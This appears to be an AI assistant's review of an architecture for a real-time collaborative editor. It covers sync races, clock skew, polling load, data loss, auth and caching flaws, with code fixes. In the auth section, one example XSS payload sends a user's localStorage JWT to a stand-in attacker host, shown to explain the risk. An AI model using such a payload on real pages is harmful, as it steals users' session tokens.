Here's the architecture for a real-time collaborative document editor (like Google Docs):

**System Overview:**
- Frontend: React SPA with WebSocket connections
- Backend: Node.js API servers behind a load balancer (round-robin)
- Database: PostgreSQL for document storage, Redis for session cache
- Real-time: Each API server maintains its own WebSocket connections to clients
- Sync Strategy: Last-write-wins with timestamps from client clocks
- Storage: Documents saved as full HTML snapshots every 30 seconds
- Auth: JWT tokens with 24-hour expiry, stored in localStorage
- CDN: CloudFront for static assets, also caches API responses for 5 minutes

**Data Flow:**
1. User types → change event sent via WebSocket to their connected server
2. Server writes change to PostgreSQL
3. Server broadcasts change to all WebSocket clients connected to THAT server
4. Other servers poll PostgreSQL every 2 seconds for changes
5. Conflict resolution: if two users edit the same paragraph, last timestamp wins

**Scaling Plan:**
- Horizontal scaling by adding more API servers
- Database read replicas for read-heavy operations
- Document partitioning by organization ID

Identify all potential failure modes, race conditions, and scaling bottlenecks in this architecture. For each issue found, propose a specific solution with trade-offs.
## 1. Split-Brain Sync Across Servers

**Problem:** Clients connected to different servers can't see each other's changes in real time.

**Race Condition Example:**

```
T0: User1 (Server A) edits para[0] = "Hello"
T1: User2 (Server B) edits para[0] = "Hi"
T2: Server A writes to DB, broadcasts to its clients
T3: Server B polls, reads User1's change, overwrites with User2's change
T4: Server B broadcasts to User2

Result: Inconsistent state between servers
```

**Solutions:**
| Solution | Trade-offs |
|---|---|
| Redis Pub/Sub for inter-server messaging | +Real-time sync across servers, -Adds Redis complexity, -Message ordering guarantees needed |
| Use WebSocket gateway (e.g., Socket.io with Redis adapter) | +Battle-tested, -Architectural change, -Added latency layer |
| Event sourcing + distributed log (Kafka) | +Audit trail, +Exactly-once semantics, -Operational complexity, -Overkill for simple edits |
**Recommended:** Redis Pub/Sub with message versioning:

```js
// Server A receives an edit
async function handleEdit(userId, docId, change, timestamp) {
  const version = await db.incrementDocVersion(docId);

  // Broadcast to clients connected to this server
  broadcastToLocalClients(docId, { ...change, version, timestamp });

  // Fan out to all other servers via Redis
  await redis.publish(`doc:${docId}`, JSON.stringify({
    type: 'edit',
    change,
    version,
    timestamp,
    serverId: process.env.SERVER_ID
  }));

  // Persist the change (persisting last favors latency over durability)
  await db.saveChange(docId, change, version, timestamp);
}
```
```js
// All servers listen; glob channel patterns require psubscribe/pmessage
redis.psubscribe('doc:*');
redis.on('pmessage', (pattern, channel, message) => {
  const { docId } = parseChannel(channel);
  const payload = JSON.parse(message);

  // Ignore our own messages (already broadcast locally)
  if (payload.serverId === process.env.SERVER_ID) return;

  // Broadcast to local clients with version info
  broadcastToLocalClients(docId, payload);
});
```
Problem: "Last-write-wins with timestamps from client clocks" is fundamentally broken.
Concrete Failure:
Real timeline:
T0 (10:00:00): User B clicks and starts typing "Hello"
T5 (10:00:05): User A clicks and types "Hi" (but A's clock says 10:00:00)
T6 (10:00:06): User B finishes typing
Server receives:
- Edit from A: timestamp=10:00:00, content="Hi"
- Edit from B: timestamp=10:00:06, content="Hello"
LWW resolution: A's edit wins (earlier timestamp)
Reality: B edited first, but loses
Solutions:
| Solution | Trade-offs |
|---|---|
| Server-assigned timestamps | +Eliminates clock skew, -Requires round-trip for every keystroke, -Increases latency |
| Hybrid: Client timestamp + server sequence number | +Tolerates clock skew, +Low latency, -Slightly more complex conflict resolution |
| Operational Transformation (OT) | +Handles concurrent edits correctly, -Complex implementation, -Difficult to debug |
| CRDT (Conflict-free Replicated Data Type) | +Mathematically sound, +Works offline, -Higher memory usage, -Larger message sizes |
**Recommended:** Hybrid approach with server sequence numbers:

```js
// Client sends its timestamp; the server assigns the authoritative sequence
async function saveChange(docId, change, clientTimestamp, userId) {
  const serverSequence = await db.getNextSequence(docId);
  const serverTimestamp = Date.now();

  const changeRecord = {
    docId,
    change,
    clientTimestamp,  // For audit/debugging only
    serverTimestamp,  // For ordering
    serverSequence,   // Tiebreaker
    userId
  };

  // Conflict resolution uses (serverSequence, userId), not client timestamps
  await db.saveChange(changeRecord);
  return { serverSequence, serverTimestamp };
}

// Conflict resolution
function resolveConflict(edit1, edit2) {
  // Server sequence is the source of truth
  if (edit1.serverSequence > edit2.serverSequence) return edit1;
  if (edit2.serverSequence > edit1.serverSequence) return edit2;
  // Tiebreaker: lexicographic on userId (deterministic across servers)
  return edit1.userId < edit2.userId ? edit1 : edit2;
}
```
## 3. LWW Silently Destroys Overlapping Edits

**Problem:** When two users edit overlapping content, one user's work is silently deleted.

**Example:**

```
Initial: "The quick brown fox"
User A (chars 0-19): Replaces with "The fast brown fox"
User B (chars 4-9):  Replaces with "The slow brown fox"

With LWW on timestamp:
- If B's edit has the later timestamp, result: "The slow brown fox"
- User A's "fast" is lost permanently
- No conflict warning is shown to either user
```

Why it matters: this is unacceptable in production. Users lose work without knowing it.

**Solutions:**
| Solution | Trade-offs |
|---|---|
| Show conflict UI to users | +Explicit, -Interrupts flow, -Requires UX design |
| CRDT (Automerge/Yjs) | +Automatic sensible merges, +Offline support, -Significant rewrite |
| Operational Transform | +Proven (Google Docs), +Merges non-overlapping edits, -Complex, steep learning curve |
| Locking mechanism | +Prevents conflicts, -Reduces concurrency, -Users blocked while others hold the lock |
**Recommended:** CRDT with Yjs (minimal rewrite):

```js
// Replace full-snapshot storage with CRDT updates
import * as Y from 'yjs';

class DocumentManager {
  constructor(docId) {
    this.docId = docId;
    this.ydoc = new Y.Doc();
    this.ytext = this.ydoc.getText('shared');
  }

  // Load persisted updates from the DB and replay them
  async load() {
    const updates = await db.getYjsUpdates(this.docId);
    updates.forEach(u => Y.applyUpdate(this.ydoc, Buffer.from(u)));
  }

  // Local edit: returns the incremental update to broadcast
  applyLocalChange(index, length, text) {
    let update;
    const capture = (u) => { update = u; }; // 'update' fires with just this delta
    this.ydoc.on('update', capture);
    this.ydoc.transact(() => {
      this.ytext.delete(index, length);
      this.ytext.insert(index, text);
    });
    this.ydoc.off('update', capture);
    return update;
  }

  // Remote edit
  applyRemoteUpdate(update) {
    Y.applyUpdate(this.ydoc, update);
    // Yjs automatically merges non-overlapping edits;
    // overlapping edits resolve by deterministic CRDT rules
  }

  // Periodic persistence
  async saveUpdate(update) {
    await db.saveYjsUpdate(this.docId, update);
  }
}
```
## 4. Cross-Server Polling Doesn't Scale

**Problem:** Cross-server synchronization via polling is fundamentally unscalable.

**Math (illustrative):** with, say, 10 API servers each polling 10,000 active documents every 2 seconds, PostgreSQL absorbs 10 × 10,000 ÷ 2 = 50,000 queries per second just for sync, before serving any real traffic.

**Bottleneck:**

```sql
-- This query runs ~50,000 times/second
SELECT * FROM changes
WHERE doc_id = ?
  AND created_at > ?
ORDER BY created_at;
```

**Solutions:**
| Solution | Trade-offs |
|---|---|
| Replace polling with Redis Pub/Sub | +O(1) message delivery, -Requires architectural change, -Redis becomes SPOF |
| Increase poll interval to 10s | +Reduces load, -Increases latency to 10s, -Unacceptable UX |
| Use database triggers + NOTIFY (PostgreSQL) | +Native, no new infrastructure (see the sketch after this table), -Requires a dedicated LISTEN connection per server, -Adds complexity |
| Event streaming (Kafka) | +Scalable, +Audit trail, -Operational overhead |
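For comparison, a minimal LISTEN/NOTIFY sketch (assumptions: the `changes` table from the polling query above, the `pg` npm client, and an illustrative channel name `doc_changes`):

```js
import pg from 'pg';

// Run once as a migration: emit a NOTIFY for every inserted change
const migrationSql = `
  CREATE OR REPLACE FUNCTION notify_doc_change() RETURNS trigger AS $$
  BEGIN
    PERFORM pg_notify('doc_changes',
      json_build_object('docId', NEW.doc_id, 'change', NEW.change_data)::text);
    RETURN NEW;
  END;
  $$ LANGUAGE plpgsql;

  CREATE TRIGGER doc_changes_notify
  AFTER INSERT ON changes
  FOR EACH ROW EXECUTE FUNCTION notify_doc_change();
`;

// Each server keeps one dedicated connection in LISTEN mode
async function startChangeListener() {
  const listener = new pg.Client({ connectionString: process.env.DATABASE_URL });
  await listener.connect();
  await listener.query('LISTEN doc_changes');
  listener.on('notification', (msg) => {
    const { docId, change } = JSON.parse(msg.payload);
    broadcastToLocalClients(docId, change);
  });
}
```

Note the trade-off: NOTIFY payloads are capped (8 KB by default), so large edits should send only an ID and be fetched separately.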
**Recommended:** Redis Pub/Sub (already in the stack):

```js
// Replace polling entirely
class SyncManager {
  constructor() {
    this.pubClient = redis.createClient();
    this.subClient = redis.createClient();
    // Register ONE message handler; subscribe() just adds channels
    this.subClient.on('message', (channel, message) => {
      const docId = channel.split(':')[1];
      const change = JSON.parse(message);
      this.broadcastToConnectedClients(docId, change);
    });
  }

  async subscribeToDocument(docId) {
    // Subscribe once per document per server
    await this.subClient.subscribe(`changes:${docId}`);
  }

  async publishChange(docId, change) {
    // Near-instant delivery to all subscribed servers
    await this.pubClient.publish(`changes:${docId}`, JSON.stringify(change));
  }
}

// Remove the polling code entirely
// Delete: setInterval(() => pollForChanges(), 2000);
```
## 5. Edits Lost Between Snapshots

**Problem:** A user's edits between snapshots are lost if the server crashes.

**Scenario:**

```
T0:  Snapshot saved (user has typed "Hello")
T15: User types " World" (not yet in a snapshot)
T20: Server crashes
T25: Server restarts, loads last snapshot

Result: " World" is lost
```

**Risk window:** up to 30 seconds of typing per active user on the crashed server, on every crash, with no way to recover it.

**Solutions:**
| Solution | Trade-offs |
|---|---|
| Write-ahead log (WAL) for every change | +No data loss, -Disk I/O overhead, -Slower writes |
| Reduce snapshot interval to 5s | +Less data loss window, -6x more snapshots, -DB load increases |
| Event sourcing: store changes, not snapshots | +Perfect audit trail, -Requires replay on load, -Slower cold starts |
| Redis persistence (AOF) | +Fast, +Durable, -Adds Redis complexity |
**Recommended:** Event sourcing with periodic snapshots:

```js
// Store individual changes, not just snapshots
async function saveChange(docId, change, version) {
  await db.query(
    `INSERT INTO changes (doc_id, change_data, version, created_at)
     VALUES ($1, $2, $3, NOW())`,
    [docId, JSON.stringify(change), version]
  );

  // Snapshot every 100 changes; version is monotonic per doc,
  // which avoids a COUNT(*) on every write
  if (version % 100 === 0) {
    await createSnapshot(docId);
  }
}

// Load a document efficiently: latest snapshot + replay
async function loadDocument(docId) {
  // Get the latest snapshot
  const snapshot = await db.query(
    `SELECT content, version FROM snapshots
     WHERE doc_id = $1
     ORDER BY version DESC LIMIT 1`,
    [docId]
  );

  // Replay changes made since that snapshot
  const changes = await db.query(
    `SELECT change_data, version FROM changes
     WHERE doc_id = $1 AND version > $2
     ORDER BY version`,
    [docId, snapshot.rows[0]?.version || 0]
  );

  // Reconstruct the document
  let doc = snapshot.rows[0]?.content || {};
  changes.rows.forEach(row => {
    doc = applyChange(doc, JSON.parse(row.change_data));
  });
  return doc;
}
```
## 6. Auth: localStorage Tokens, Stale Caches, Long Expiry

**Problem:** Multiple authorization vulnerabilities compound each other.

**Issue 1: localStorage is XSS-vulnerable.** Any script injected into the page can exfiltrate the token:

```html
<!-- Attacker injects script via malicious document content -->
<script>
  fetch('https://attacker.com?token=' + localStorage.getItem('jwt'));
</script>
```

**Issue 2: the 5-minute API cache serves responses after access is revoked:**

```
T0: User logs in, gets a valid JWT
T1: Admin revokes the user's access in the database
T2: User makes a request → served from cache, bypassing the auth check
T3: Request succeeds with revoked permissions
```

**Issue 3: 24-hour token expiry is too long.** A stolen token stays valid for a full day with no built-in way to invalidate it.

**Solutions:**
| Solution | Trade-offs |
|---|---|
| httpOnly cookies + CSRF tokens | +Immune to XSS for token theft, -Requires CSRF protection, -Slightly more complex |
| Short-lived tokens (15 min) + refresh tokens | +Reduces window of compromise, -More refresh requests, -Requires refresh token storage |
| Remove API caching for auth-required endpoints | +Always enforces current permissions, -Increases load, -Reduces performance |
| Token revocation list (Redis) | +Instant revocation, -Redis lookup per request, -Cache invalidation complexity |
**Recommended:** httpOnly cookies + short-lived tokens + Redis revocation:

```js
// Assumes Express with cookie-parser, `jsonwebtoken`, and a connected redis client
import crypto from 'crypto';
import jwt from 'jsonwebtoken';

// Auth middleware
async function authMiddleware(req, res, next) {
  const token = req.cookies.jwt; // httpOnly cookie
  if (!token) return res.status(401).json({ error: 'Unauthorized' });

  try {
    const decoded = jwt.verify(token, SECRET, {
      algorithms: ['HS256'],
      issuer: 'https://yourdomain.com',
      audience: 'api'
    });

    // Check the revocation list
    const isRevoked = await redis.get(`revoked:${decoded.jti}`);
    if (isRevoked) {
      return res.status(401).json({ error: 'Token revoked' });
    }

    req.user = decoded;
    next();
  } catch (err) {
    return res.status(401).json({ error: 'Invalid token' });
  }
}

// Login endpoint
app.post('/login', async (req, res) => {
  const user = await authenticateUser(req.body);

  const token = jwt.sign(
    {
      sub: user.id,
      jti: crypto.randomUUID() // Unique token ID enables revocation
    },
    SECRET,
    {
      expiresIn: '15m', // Short expiry
      issuer: 'https://yourdomain.com',
      audience: 'api'
    }
  );

  const refreshToken = jwt.sign(
    { sub: user.id },
    REFRESH_SECRET,
    { expiresIn: '7d' }
  );

  res.cookie('jwt', token, {
    httpOnly: true,
    secure: true,
    sameSite: 'strict',
    maxAge: 15 * 60 * 1000
  });
  res.cookie('refreshToken', refreshToken, {
    httpOnly: true,
    secure: true,
    sameSite: 'strict',
    maxAge: 7 * 24 * 60 * 60 * 1000
  });
  res.json({ success: true });
});

// Logout endpoint
app.post('/logout', async (req, res) => {
  const token = req.cookies.jwt;
  const decoded = token && jwt.decode(token);
  if (decoded?.jti) {
    // Revoke for the token's remaining lifetime
    await redis.setex(`revoked:${decoded.jti}`, 15 * 60, '1');
  }
  res.clearCookie('jwt');
  res.clearCookie('refreshToken');
  res.json({ success: true });
});

// Refresh token endpoint
app.post('/refresh', (req, res) => {
  const refreshToken = req.cookies.refreshToken;
  try {
    const decoded = jwt.verify(refreshToken, REFRESH_SECRET);
    const newToken = jwt.sign(
      { sub: decoded.sub, jti: crypto.randomUUID() },
      SECRET,
      { expiresIn: '15m' }
    );
    res.cookie('jwt', newToken, {
      httpOnly: true,
      secure: true,
      sameSite: 'strict',
      maxAge: 15 * 60 * 1000
    });
    res.json({ success: true });
  } catch (err) {
    res.status(401).json({ error: 'Invalid refresh token' });
  }
});
```
## 7. CDN Caching of API Responses Serves Stale Documents

**Problem:** Caching API responses breaks real-time collaboration.

**Scenario:**

```
T0: User A requests document state → server returns "Hello"
T1: User B edits the document to "Hello World"
T2: User A refreshes the page within 5 minutes
T3: CloudFront returns the cached "Hello" (stale data)
T4: User A continues editing from the stale state
T5: Conflict when both edits merge
```

**Solutions:**
| Solution | Trade-offs |
|---|---|
| Remove API caching entirely (Cache-Control: no-cache) | +Always fresh, -Increases origin load, -Slower for read-heavy workloads |
| Separate CDN for static assets only | +Caches CSS/JS, -Doesn't cache API, -More complex routing |
| Cache API by document version | +Can cache longer, -Invalidation complexity, -Requires version headers |
| Use Cache-Control: private, max-age=0 | +Browser still caches, -CDN doesn't cache, -Minimal benefit |
**Recommended:** Separate CDN tiers:

```js
// Static assets (cacheable; include a content hash in filenames for busting)
app.use(express.static('public', {
  setHeaders: (res, path) => {
    if (path.endsWith('.js') || path.endsWith('.css')) {
      res.setHeader('Cache-Control', 'public, max-age=31536000, immutable');
    }
  }
}));

// API endpoints (never cacheable)
app.get('/api/documents/:docId', (req, res) => {
  res.setHeader('Cache-Control', 'no-cache, no-store, must-revalidate');
  res.setHeader('Pragma', 'no-cache');
  res.setHeader('Expires', '0');
  // ... return document
});
```

CloudFront configuration:
- Whitelist only static asset paths for caching
- API paths bypass the cache entirely
- Use separate behaviors for different path patterns
## 8. Concurrent Operations Need OT or a CRDT

**Problem:** The current LWW scheme cannot merge concurrent operations at all:

```
Document: "abcdef"
User A: delete "c" (index 2)               → "abdef"
User B: insert "X" at index 3 (after "c")  → "abcXdef"

Naive replay without transformation diverges:
- Apply A's op, then B's at its stale index 3: "abdef"   → "abdXef"
- Apply B's op, then A's at its stale index 2: "abcXdef" → "abXdef"

The intent-preserving merge is "abXdef"; LWW instead keeps one whole
edit and discards the other.
```

**Solutions:**
| Solution | Trade-offs |
|---|---|
| Implement OT (Operational Transform) | +Battle-tested (Google Docs), +Handles overlapping edits, -Complex (200+ LOC minimum), -Difficult to debug |
| Use CRDT library (Yjs/Automerge) | +Automatic merging, +Offline support, +Simpler than OT, -Larger message sizes, -Memory overhead |
| Pessimistic locking | +Prevents conflicts, -Reduces concurrency, -Poor UX (users wait for locks) |
**Recommended:** Yjs (already mentioned in #3, but critical enough to restate). Each user edits their own replica; exchanging updates converges both sides:

```js
import * as Y from 'yjs';

// Two replicas, both seeded with "abcdef"
const docA = new Y.Doc();
const docB = new Y.Doc();
docA.getText('content').insert(0, 'abcdef');
Y.applyUpdate(docB, Y.encodeStateAsUpdate(docA));

docA.getText('content').delete(2, 1);   // User A deletes "c"
docB.getText('content').insert(3, 'X'); // User B inserts "X" (concurrent)

// Exchange updates; both replicas converge deterministically
Y.applyUpdate(docB, Y.encodeStateAsUpdate(docA));
Y.applyUpdate(docA, Y.encodeStateAsUpdate(docB));
console.log(docA.getText('content').toString()); // "abXdef", both edits kept
```
## 9. No Presence or Cursor Awareness

**Problem:** Users don't know who else is editing or where.

**Risks:** users unknowingly edit the same region, duplicate each other's work, and hit conflicts that presence indicators would have prevented.

**Solutions:**
| Solution | Trade-offs |
|---|---|
| Cursor presence via WebSocket | +Real-time, +Low latency, -Requires tracking per connection |
| Activity log in sidebar | +Shows recent edits, -Not real-time, -Requires polling |
| Collaborative cursors library | +Battle-tested, +Integrates with CRDT, -Adds dependencies |
**Recommended:** Yjs with y-protocols for awareness:

```js
import * as Y from 'yjs';
import * as awarenessProtocol from 'y-protocols/awareness';

const ydoc = new Y.Doc();
// Awareness is a separate object layered on the doc, not a Y.Doc property
const awareness = new awarenessProtocol.Awareness(ydoc);

// Broadcast local presence state
awareness.setLocalState({
  user: {
    name: currentUser.name,
    color: currentUser.color,
    clientID: ydoc.clientID
  },
  cursor: {
    anchor: 0,
    head: 5
  }
});

// Listen for remote presence changes
awareness.on('change', ({ added, updated, removed }) => {
  [...added, ...updated].forEach(clientID => {
    const state = awareness.getStates().get(clientID);
    if (state) {
      renderRemoteCursor(clientID, state.cursor);
    }
  });
  // removeRemoteCursor: app-side helper, counterpart to renderRemoteCursor
  removed.forEach(clientID => removeRemoteCursor(clientID));
});
```
## 10. No Offline Support

**Problem:** Users lose their connection → unsent edits are lost with it.

**Solutions:**
| Solution | Trade-offs |
|---|---|
| Local storage queue + retry | +Simple, -Manual sync logic, -Data loss on browser crash |
| Service Worker + IndexedDB | +Works offline, +Syncs on reconnect, -Browser storage limits, -Complexity |
| CRDT with local persistence | +Automatic sync, +Works offline, +Yjs has built-in support, -Larger payload |
**Recommended:** Yjs with IndexedDB persistence:

```js
import * as Y from 'yjs';
import { IndexeddbPersistence } from 'y-indexeddb';

const ydoc = new Y.Doc();
const ytext = ydoc.getText('content');
const persistence = new IndexeddbPersistence('document-id', ydoc);

persistence.whenSynced.then(() => {
  console.log('Loaded from IndexedDB');
});

// Works offline: edits are stored in IndexedDB...
ytext.insert(0, 'offline edit');
// ...and sync automatically over WebSocket on reconnect
```
## 11. Round-Robin Load Balancing Breaks WebSocket Affinity

**Problem:** A user who reconnects is routed to a different server and loses their WebSocket state.

**Scenario:**

```
Request 1: User A → Load Balancer → Server 1 (WebSocket connected)
Request 2: User A → Load Balancer → Server 2 (no WebSocket state)

Result: User A's edits don't broadcast to their own clients
```

**Solutions:**
| Solution | Trade-offs |
|---|---|
| Sticky sessions (IP hash or cookie) | +Keeps user on same server, -Uneven load distribution, -Server failures lose connections |
| Shared session store (Redis) | +Load balancer can distribute freely, +Server failures don't lose state, -Redis lookup per request |
| WebSocket gateway (e.g., Socket.io) | +Handles reconnection, +Automatic load balancing, -Additional latency |
**Recommended:** Sticky sessions + Redis fallback:

```nginx
# Nginx: hash on client IP so a user always lands on the same server
upstream api_servers {
  ip_hash;
  server api1.internal:3000;
  server api2.internal:3000;
  server api3.internal:3000;
}
```

```js
// Node.js: track WebSocket metadata in Redis for failover
const wsClients = new Map(); // Local cache

io.on('connection', async (socket) => {
  const userId = socket.handshake.auth.userId;
  const serverId = process.env.SERVER_ID;

  // Track locally
  wsClients.set(userId, socket);

  // Also record in Redis so other servers can route to us
  await redis.setex(
    `ws:${userId}`,
    3600,
    JSON.stringify({ serverId, socketId: socket.id })
  );

  socket.on('disconnect', async () => {
    wsClients.delete(userId);
    await redis.del(`ws:${userId}`);
  });
});

// Broadcast to a user (works across servers)
async function broadcastToUser(userId, message) {
  // Try a local socket first
  const localSocket = wsClients.get(userId);
  if (localSocket) {
    localSocket.emit('update', message);
    return;
  }

  // Otherwise look up which server holds the connection
  const wsInfo = await redis.get(`ws:${userId}`);
  if (wsInfo) {
    const { serverId } = JSON.parse(wsInfo);
    // Publish to that server's channel for this user
    await redis.publish(`user:${userId}:${serverId}`, JSON.stringify(message));
  }
}
```
## 12. No Rate Limiting on Edits

**Problem:** A malicious user can spam edits → DoS:

```
Attacker: sends 1,000 edits/second
Result: database overloaded, all users experience lag
```

**Solutions:**
| Solution | Trade-offs |
|---|---|
| Token bucket per user | +Fair, +Configurable, -Requires tracking per user |
| Redis rate limiter | +Fast, +Distributed, -Redis lookup per request |
| Adaptive rate limiting | +Responds to load, -More complex |
**Recommended:** a Redis-backed limiter. The sketch below is a fixed-window counter, the simplest variant; a true token bucket that tolerates bursts follows after it:

```js
async function checkRateLimit(userId, docId) {
  const key = `ratelimit:${userId}:${docId}`;
  const limit = 100; // 100 edits per minute
  const window = 60; // seconds

  const current = await redis.incr(key);
  if (current === 1) {
    // First hit in this window: start the window timer
    await redis.expire(key, window);
  }
  if (current > limit) {
    throw new Error('Rate limit exceeded');
  }
}

// Use in the edit handler
io.on('connection', (socket) => {
  socket.on('edit', async (data) => {
    try {
      await checkRateLimit(socket.userId, data.docId);
      await handleEdit(data);
    } catch (err) {
      socket.emit('error', { message: 'Rate limit exceeded' });
    }
  });
});
```
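For burst tolerance, a true token bucket can run atomically in Redis via a short Lua script. A sketch under assumptions: `redis` is the node-redis v4 client, and the capacity/rate parameters are illustrative:

```js
// Refill-on-demand token bucket, evaluated atomically inside Redis
const TOKEN_BUCKET_LUA = `
  local tokens = tonumber(redis.call('HGET', KEYS[1], 'tokens') or ARGV[1])
  local last   = tonumber(redis.call('HGET', KEYS[1], 'last') or ARGV[3])
  local rate   = tonumber(ARGV[2])  -- tokens added per second
  local now    = tonumber(ARGV[3])
  tokens = math.min(tonumber(ARGV[1]), tokens + (now - last) * rate)
  local allowed = 0
  if tokens >= 1 then
    tokens = tokens - 1
    allowed = 1
  end
  redis.call('HSET', KEYS[1], 'tokens', tokens, 'last', now)
  redis.call('EXPIRE', KEYS[1], 120)
  return allowed
`;

async function allowEdit(userId, docId) {
  const capacity = 20; // max burst size
  const rate = 2;      // sustained edits per second
  const now = Date.now() / 1000;
  const allowed = await redis.eval(TOKEN_BUCKET_LUA, {
    keys: [`bucket:${userId}:${docId}`],
    arguments: [String(capacity), String(rate), String(now)]
  });
  return allowed === 1;
}
```

Unlike the fixed window, this lets a user burst up to `capacity` edits and then settle at `rate`, with no boundary effect at window edges.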
## 13. No Audit Trail or Version History

**Problem:** There's no way to answer "who changed what, when," or to recover from mistakes.

**Solutions:**
| Solution | Trade-offs |
|---|---|
| Store all changes in audit table | +Complete history, +Can restore any version, -Storage overhead |
| Event sourcing | +Audit trail is primary source, +Can replay, -Architectural change |
| Immutable log (Kafka) | +Durable, +Scalable, -Operational complexity |
**Recommended:** Audit table (simple):

```js
import crypto from 'crypto';

async function saveChange(docId, change, userId) {
  const changeId = crypto.randomUUID();
  await db.query(
    `INSERT INTO document_changes
       (id, doc_id, user_id, change_data, created_at)
     VALUES ($1, $2, $3, $4, NOW())`,
    [changeId, docId, userId, JSON.stringify(change)]
  );
  return changeId;
}

// Query the audit trail
async function getHistory(docId, limit = 100) {
  return db.query(
    `SELECT id, user_id, change_data, created_at
     FROM document_changes
     WHERE doc_id = $1
     ORDER BY created_at DESC
     LIMIT $2`,
    [docId, limit]
  );
}

// Restore the document to a specific point in its history
async function restoreToVersion(docId, changeId) {
  const changes = await db.query(
    `SELECT change_data FROM document_changes
     WHERE doc_id = $1 AND created_at <=
       (SELECT created_at FROM document_changes WHERE id = $2)
     ORDER BY created_at`,
    [docId, changeId]
  );

  let doc = {};
  changes.rows.forEach(row => {
    doc = applyChange(doc, JSON.parse(row.change_data));
  });
  return doc;
}
```
## 14. Document Metadata Races (Rename Conflicts)

**Problem:** What if two users rename the same document simultaneously?

**Solutions:** metadata changes are low-frequency, so optimistic concurrency is enough: keep a `version` column on the document row and reject updates whose expected version is stale (plain LWW with a conflict notice is an acceptable fallback for a field like a title). A minimal sketch follows.
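A hedged sketch of optimistic locking for renames (assumes a `documents` table with a `version` column; names are illustrative):

```js
async function renameDocument(docId, newTitle, expectedVersion) {
  const result = await db.query(
    `UPDATE documents
     SET title = $1, version = version + 1
     WHERE id = $2 AND version = $3`,
    [newTitle, docId, expectedVersion]
  );
  if (result.rowCount === 0) {
    // Someone renamed it first: surface the conflict instead of silently losing it
    throw new Error('Document was renamed by another user; reload and retry');
  }
}
```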
## 15. Read Replica Lag

**Problem:** A user reads stale data from a replica immediately after writing.

**Solutions:** use read-your-writes routing: send a user's reads to the primary for a short window after they write (or track the replication LSN and only use a replica once it has caught up). Trade-off: more primary load for recently active users. A sketch follows.
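A minimal read-your-writes sketch (hedged: the Redis key, the 5-second window, and the `primaryPool`/`replicaPool` handles are illustrative assumptions):

```js
// After any write, pin this user's reads to the primary briefly
async function afterWrite(userId) {
  await redis.setex(`pin-primary:${userId}`, 5, '1');
}

// Choose a connection pool for a read
async function getDbForRead(userId) {
  const pinned = await redis.get(`pin-primary:${userId}`);
  return pinned ? primaryPool : replicaPool;
}
```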
## 16. No Backup / Disaster Recovery Plan

**Problem:** Database corruption → all documents lost.

**Solutions:** continuous WAL archiving with point-in-time recovery (e.g., pgBackRest or WAL-G), scheduled automated backups with periodic restore tests, and a cross-region replica for regional failure. Trade-offs: storage cost and the operational work of regular restore drills.
## Summary

| Issue | Severity | Root Cause | Recommended Fix | Effort |
|---|---|---|---|---|
| Split-brain sync | CRITICAL | No inter-server messaging | Redis Pub/Sub | Medium |
| Client clock skew | CRITICAL | Client-side timestamps | Server sequence numbers | Low |
| LWW data loss | CRITICAL | Naive conflict resolution | CRDT (Yjs) | High |
| Polling scalability | CRITICAL | 50k QPS polling | Redis Pub/Sub | Medium |
| Snapshot data loss | CRITICAL | 30s window | Event sourcing | Medium |
| Auth bypass | CRITICAL | localStorage + cache | httpOnly + short-lived tokens | Medium |
| API caching | CRITICAL | CloudFront on dynamic data | Separate static/API CDN | Low |
| No OT/CRDT | MAJOR | Naive conflict resolution | Yjs library | High |
| No offline support | MAJOR | Missing persistence | IndexedDB + Yjs | Medium |
| No session affinity | MAJOR | Round-robin LB | IP hash + Redis | Low |
| No rate limiting | MAJOR | Missing limits | Redis token bucket | Low |
| No audit trail | MAJOR | Missing logging | Audit table | Low |
The architecture needs a complete overhaul of the sync/conflict resolution layer. Start with Redis Pub/Sub + Yjs CRDT, then address auth and persistence.